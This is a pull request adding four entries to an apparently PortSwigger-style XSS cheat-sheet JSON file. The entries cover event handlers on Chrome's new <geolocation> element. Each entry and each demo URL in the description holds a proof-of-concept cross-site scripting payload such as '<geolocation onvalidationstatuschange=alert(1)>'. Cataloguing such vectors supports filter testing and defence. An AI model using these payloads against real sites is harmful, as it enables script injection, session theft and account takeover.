### PR TITLE
Add events for the new <geolocation> element in chrome

### DIFF
--- a/json/events.json
+++ b/json/events.json
@@ -6463,5 +6463,49 @@
         "interaction": false
       }
     ]
+  },
+  "onvalidationstatuschange": {
+    "description": "Fires when a form control’s validation state changes",
+    "tags": [
+      {
+        "tag": "geolocation",
+        "code": "<geolocation onvalidationstatuschange=alert(1)>",
+        "browsers": ["chrome"],
+        "interaction": false
+      }
+    ]
+  },
+  "onpromptdismiss": {
+    "description": "Fires when the user opens the prompt and closes it without responding",
+    "tags": [
+      {
+        "tag": "geolocation",
+        "code": "<geolocation onpromptdismiss=alert(1)>",
+        "browsers": ["chrome"],
+        "interaction": true
+      }
+    ]
+  },
+  "onpromptaction": {
+    "description": "Fires when the user takes an action in the prompt (such as confirm)",
+    "tags": [
+      {
+        "tag": "geolocation",
+        "code": "<geolocation onpromptaction=alert(1)>",
+        "browsers": ["chrome"],
+        "interaction": true
+      }
+    ]
+  },
+  "onlocation": {
+    "description": "Fires when the browser requests the user’s location after permission is granted",
+    "tags": [
+      {
+        "tag": "geolocation",
+        "code": "<geolocation autolocate onlocation=alert(1)>",
+        "browsers": ["chrome"],
+        "interaction": true
+      }
+    ]
   }
 }


### PR DESCRIPTION
For a quick demonstration, use the following payloads to trigger the event handlers:

- https://portswigger-labs.net/xss/xss.php?x=%3Cgeolocation%20onvalidationstatuschange=alert(1)%3E
- https://portswigger-labs.net/xss/xss.php?x=%3Cgeolocation%20onpromptdismiss=alert(1)%3E
- https://portswigger-labs.net/xss/xss.php?x=%3Cgeolocation%20autolocation%20onlocation=alert(1)%3E
- https://portswigger-labs.net/xss/xss.php?x=%3Cgeolocation%20onpromptaction=alert(1)%3E
